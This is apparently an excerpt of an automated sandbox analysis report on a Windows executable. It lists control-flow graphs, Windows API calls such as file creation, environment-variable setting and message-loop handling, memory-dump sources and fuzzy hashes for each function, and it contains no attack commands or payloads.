                                                                                                                                                                          control_flow_graph 997 b298e0-b29901 call b3ec50 1000 b29903-b29906 997->1000 1001 b2990c 997->1001 1000->1001 1002 b29908-b2990a 1000->1002 1003 b2990e-b2991f 1001->1003 1002->1003 1004 b29921 1003->1004 1005 b29927-b29931 1003->1005 1004->1005 1006 b29933 1005->1006 1007 b29936-b29943 call b26edb 1005->1007 1006->1007 1010 b29945 1007->1010 1011 b2994b-b2996a CreateFileW 1007->1011 1010->1011 1012 b299bb-b299bf 1011->1012 1013 b2996c-b2998e GetLastError call b2bb03 1011->1013 1015 b299c3-b299c6 1012->1015 1017 b299c8-b299cd 1013->1017 1021 b29990-b299b3 CreateFileW GetLastError 1013->1021 1015->1017 1018 b299d9-b299de 1015->1018 1017->1018 1022 b299cf 1017->1022 1019 b299e0-b299e3 1018->1019 1020 b299ff-b29a10 1018->1020 1019->1020 1023 b299e5-b299f9 SetFileTime 1019->1023 1024 b29a12-b29a2a call b30602 1020->1024 1025 b29a2e-b29a39 1020->1025 1021->1015 1026 b299b5-b299b9 1021->1026 1022->1018 1023->1020 1024->1025 1026->1015
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B27760,?,00000005,?,00000011), ref: 00B2995F
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00B27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B2996C
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B27760,?,00000005,?), ref: 00B299A2
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00B27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B299AA
                                                                                                                                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B299F9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CreateErrorLast$Time
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1999340476-0
                                                                                                                                                                          • Opcode ID: fc6ba53388df6e971417a51bf801e063c467b03254ecf1c633452780c323a6e7
                                                                                                                                                                          • Instruction ID: 8fcaedb865df03e229d30fd2649ba13399157b24c5bd8007a247ab619733d84b
                                                                                                                                                                          • Opcode Fuzzy Hash: fc6ba53388df6e971417a51bf801e063c467b03254ecf1c633452780c323a6e7
                                                                                                                                                                          • Instruction Fuzzy Hash: B73123305443516FE7209B20EC86B9ABBD4FB04330F200B5DF9AD922C0D7B4A994CB91
                                                                                                                                                                          Function 00B3B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1056 b3b568-b3b581 PeekMessageW 1057 b3b583-b3b597 GetMessageW 1056->1057 1058 b3b5bc-b3b5be 1056->1058 1059 b3b599-b3b5a6 IsDialogMessageW 1057->1059 1060 b3b5a8-b3b5b6 TranslateMessage DispatchMessageW 1057->1060 1059->1058 1059->1060 1060->1058
                                                                                                                                                                          APIs
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3B579
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B58A
                                                                                                                                                                          • IsDialogMessageW.USER32(0001046A,?), ref: 00B3B59E
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00B3B5AC
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00B3B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1266772231-0
                                                                                                                                                                          • Opcode ID: 3c378d2d9166a22fac95fb3f4a942dd5cca29f29d9c352fa95e1e304b2d16ac6
                                                                                                                                                                          • Instruction ID: d63c20bd99992fe858e8c396234ed7bd185b1862c63218325246a06904166d39
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c378d2d9166a22fac95fb3f4a942dd5cca29f29d9c352fa95e1e304b2d16ac6
                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF0BD71A0111AABCB20ABE5DC4CEDB7FECEE05A917004515B505D3064EF78D605CBB0
                                                                                                                                                                          Function 00B3ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1061 b3abab-b3abca GetClassNameW 1062 b3abf2-b3abf4 1061->1062 1063 b3abcc-b3abe1 call b31fbb 1061->1063 1065 b3abf6-b3abf9 SHAutoComplete 1062->1065 1066 b3abff-b3ac01 1062->1066 1068 b3abe3-b3abef FindWindowExW 1063->1068 1069 b3abf1 1063->1069 1065->1066 1068->1069 1069->1062
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 00B3ABC2
                                                                                                                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B3ABF9
                                                                                                                                                                            • Part of subcall function 00B31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B2C116,00000000,.exe,?,?,00000800,?,?,?,00B38E3C), ref: 00B31FD1
                                                                                                                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B3ABE9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                          • String ID: EDIT
                                                                                                                                                                          • API String ID: 4243998846-3080729518
                                                                                                                                                                          • Opcode ID: 2c68f2c9d4b4e14d1a8db2330544203abed68f10c626c1bced24f74781d29601
                                                                                                                                                                          • Instruction ID: 03edd7edd0120b0e315e0ce3613a954450b1a882df74497f1da81edc9a3849e9
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c68f2c9d4b4e14d1a8db2330544203abed68f10c626c1bced24f74781d29601
                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0823260022876DB2056249C09F9BB6EC9B46F40F584091BE45A3190EB60DE45C6B6
                                                                                                                                                                          Function 00B3DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1070 b3dbde-b3dc09 call b3ec50 SetEnvironmentVariableW call b30371 1074 b3dc0e-b3dc12 1070->1074 1075 b3dc36-b3dc38 1074->1075 1076 b3dc14-b3dc18 1074->1076 1077 b3dc21-b3dc28 call b3048d 1076->1077 1080 b3dc1a-b3dc20 1077->1080 1081 b3dc2a-b3dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B3DBF4
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B3DC30
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                          • String ID: sfxcmd$sfxpar
                                                                                                                                                                          • API String ID: 1431749950-3493335439
                                                                                                                                                                          • Opcode ID: 00f6acbba18f0696cb36fb1c48c7f730b32b7020bfd60167610b773149f1d5cd
                                                                                                                                                                          • Instruction ID: 2be58eb27d24069a1ff14eec4d76125f86cbe4d67e023251c13b80745072d99b
                                                                                                                                                                          • Opcode Fuzzy Hash: 00f6acbba18f0696cb36fb1c48c7f730b32b7020bfd60167610b773149f1d5cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF0EC72414724A7CB202FA59C06BFA3BD8EF04B83F5404D1BD85A6151E6B0D980D6B0
                                                                                                                                                                          Function 00B29785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1082 b29785-b29791 1083 b29793-b2979b GetStdHandle 1082->1083 1084 b2979e-b297b5 ReadFile 1082->1084 1083->1084 1085 b29811 1084->1085 1086 b297b7-b297c0 call b298bc 1084->1086 1087 b29814-b29817 1085->1087 1090 b297c2-b297ca 1086->1090 1091 b297d9-b297dd 1086->1091 1090->1091 1092 b297cc 1090->1092 1093 b297ee-b297f2 1091->1093 1094 b297df-b297e8 GetLastError 1091->1094 1095 b297cd-b297d7 call b29785 1092->1095 1097 b297f4-b297fc 1093->1097 1098 b2980c-b2980f 1093->1098 1094->1093 1096 b297ea-b297ec 1094->1096 1095->1087 1096->1087 1097->1098 1100 b297fe-b29807 GetLastError 1097->1100 1098->1087 1100->1098 1102 b29809-b2980a 1100->1102 1102->1095
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B29795
                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B297AD
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00B297DF
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00B297FE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2244327787-0
                                                                                                                                                                          • Opcode ID: 248c3ccbc8b8fe8ab3bced08efd321a6adec93237c951eb778106bcddec656d6
                                                                                                                                                                          • Instruction ID: 30b1202e40e9589c8ca15d7ec77c70ea6f991681296de632e6601cb153f32661
                                                                                                                                                                          • Opcode Fuzzy Hash: 248c3ccbc8b8fe8ab3bced08efd321a6adec93237c951eb778106bcddec656d6
                                                                                                                                                                          • Instruction Fuzzy Hash: 7311E530910324EBDF215F24E84476A37E9FB027A1F1489A9F41ECA2A0D770CE44DB61
                                                                                                                                                                          Function 00B4AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B43F73,00000000,00000000,?,00B4ACDB,00B43F73,00000000,00000000,00000000,?,00B4AED8,00000006,FlsSetValue), ref: 00B4AD66
                                                                                                                                                                          • GetLastError.KERNEL32(?,00B4ACDB,00B43F73,00000000,00000000,00000000,?,00B4AED8,00000006,FlsSetValue,00B57970,FlsSetValue,00000000,00000364,?,00B498B7), ref: 00B4AD72
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B4ACDB,00B43F73,00000000,00000000,00000000,?,00B4AED8,00000006,FlsSetValue,00B57970,FlsSetValue,00000000), ref: 00B4AD80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: aed4af459dd50cfee169780b7996cabe77048057c65917b6e60ddd25b2ec64c1
                                                                                                                                                                          • Instruction ID: 90859cf877ff393f1b40ec54eaff912a88de4422af0220758a4952d764fb15f9
                                                                                                                                                                          • Opcode Fuzzy Hash: aed4af459dd50cfee169780b7996cabe77048057c65917b6e60ddd25b2ec64c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 85014C32A81322ABC7224F689C84B577BE8EF04BB371002B0F806D3660DF21CA01D6E1
                                                                                                                                                                          Function 00B29F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B2D343,00000001,?,?,?,00000000,00B3551D,?,?,?), ref: 00B29F9E
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00B3551D,?,?,?,?,?,00B34FC7,?), ref: 00B29FE5
                                                                                                                                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B2D343,00000001,?,?), ref: 00B2A011
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite$Handle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4209713984-0
                                                                                                                                                                          • Opcode ID: ca55e3377077eaf1acca80483a950c4b71a95e4615e005eab3596a93b03bc17c
                                                                                                                                                                          • Instruction ID: 9f8022f3eefb309004ebe681127ec859ff043ec89e8ac44f6c1be0d3a82a8537
                                                                                                                                                                          • Opcode Fuzzy Hash: ca55e3377077eaf1acca80483a950c4b71a95e4615e005eab3596a93b03bc17c
                                                                                                                                                                          • Instruction Fuzzy Hash: 5131B031204325AFDB14CF20E958BAFB7E5EB84B11F040999F54997290CB75AD48CBA2
                                                                                                                                                                          Function 00B2A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B2C27E: _wcslen.LIBCMT ref: 00B2C284
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A2D9
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A30C
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A329
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2260680371-0
                                                                                                                                                                          • Opcode ID: 9194fa193c2a4b37903bd68c24537b26bc034aae25724c682e56c01e9b6dabac
                                                                                                                                                                          • Instruction ID: 17d0e8bcb81ebe6668015b8dd96f521fe4e4df14d4d5a366486ac809d11211e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 9194fa193c2a4b37903bd68c24537b26bc034aae25724c682e56c01e9b6dabac
                                                                                                                                                                          • Instruction Fuzzy Hash: 4101B131200330ABEF21EB756C59BEE37C8DF0A781F0844D5F909E61C1DB64DA8186BA
                                                                                                                                                                          Function 00B4B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B4B8B8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                          • Opcode ID: d5a603b0c0fc9cfd1e61c181014408ee9811457381bb02f11c931e779f9258ed
                                                                                                                                                                          • Instruction ID: 6189f8085e2f1ddf35fb1a3b5f8bcc570ae732cc2fca984cff1dbfdffcb34466
                                                                                                                                                                          • Opcode Fuzzy Hash: d5a603b0c0fc9cfd1e61c181014408ee9811457381bb02f11c931e779f9258ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 9641C67050438CAADF218E648C84FF6BBF9EB55304F1404EDE6DA87142D735EB45AB60
                                                                                                                                                                          Function 00B4AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00B4AFDD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String
                                                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                                                          • Opcode ID: 27cfbacf60b84f67788b6c96e4269cbf746b21338e96431907f07edc368f5a2a
                                                                                                                                                                          • Instruction ID: ae317886c83fd66561124d4188b0db7e6705d8868fa3a8474b37aa7333423421
                                                                                                                                                                          • Opcode Fuzzy Hash: 27cfbacf60b84f67788b6c96e4269cbf746b21338e96431907f07edc368f5a2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 52010C72644209BBCF129F90DC05EEE7FA6EF08751F054195FE1466170CA728A31EB91
                                                                                                                                                                          Function 00B4AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B4A56F), ref: 00B4AF55
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                                                                                                          • API String ID: 2593887523-3084827643
                                                                                                                                                                          • Opcode ID: 8a6c0d7b8ba05011c8802c5aabd02be5127b31ee6187af7768e14c4327a78740
                                                                                                                                                                          • Instruction ID: 9e8bbbb3ca28ceaefdf170177c7b3812834a3440bdf6999d81e8d37e7e2bd346
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6c0d7b8ba05011c8802c5aabd02be5127b31ee6187af7768e14c4327a78740
                                                                                                                                                                          • Instruction Fuzzy Hash: CAF09031685218BBCB025F50DC02EADBBE5EF04B52B0040D4FC0896260DE725F14AB95
